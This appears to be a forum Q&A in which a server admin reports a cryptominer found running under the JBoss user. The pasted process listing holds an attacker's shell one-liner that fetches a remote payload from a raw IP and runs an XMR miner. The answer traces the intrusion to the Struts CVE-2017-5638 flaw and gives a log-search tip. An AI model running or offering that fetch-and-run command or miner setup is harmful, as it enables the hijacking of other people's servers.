# JBoss AS 7.1.0 Final possible security issue

Tags: security, jboss, jboss7.x

During the last days I have found on my server a suspicious running processes on my server.

```
jboss    23276  0.0  0.0 113108   644 ?        S    04:25   0:00 /bin/bash -c cd /tmp; rm yam; pkill -9 yam; pkill -9 minergate-cli;curl -ks http://107.155.106.174/t/5tf-1478613950.txt > yam || (wget https://107.155.106.174/t/5tf-1478613950.txt --no-check-certifica
jboss    23277  374  0.1 424456 35600 ?        Sl   04:25 2880:22 ./yam --mining-params xmr:av=0&donation-interval=50 -c x -M stratum+tcp://dxzgadfgsdfgsdfgsdfgsdfgwerjukQdysdddRFch2CGykmqWUJPJW2hf23AaJWXmEPe96xYyYVDGn7qN:x@xmr-usa.dwarfpool.com:9050/
```

I have search on internet and seems to be that someone is using my server as a computing node to bitcoin mining. So someone managed to upload and run this on my server. As far as I know doesn't have access to the password and only is able to do this on the Linux user jboss and my jboss application is running also under this user.

As a quick solution I have create a file with the same names on the tmp folder as root so it will no have access to overwrite it. And also I'm running a script to check every minute if a process who contain some of those process parameter is running.

I want to find the source of this issue. The jboss management console is deactivated.

BTW: my server run a Centos 7 and java version "1.7.0_79".

Answer (score 1, accepted):

Propably you have same issue like we had on our server.

It's about vulnereability in Apache Struts, look on this https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638 and this https://cwiki.apache.org/confluence/display/WW/S2-045

In our case someone was mining and trying get some information about operating system (SSH version, Os family, users,...). Fortunatelly we are running application under dedicated account and without any public accessed ports (attack misuse proxied app). But you should check some logs and looking some "multipart/form-data" (in our case)

```
grep -r -ni 'multipart/form-data'
```

Comment: Thanks for you answer. Seems to be our problem also.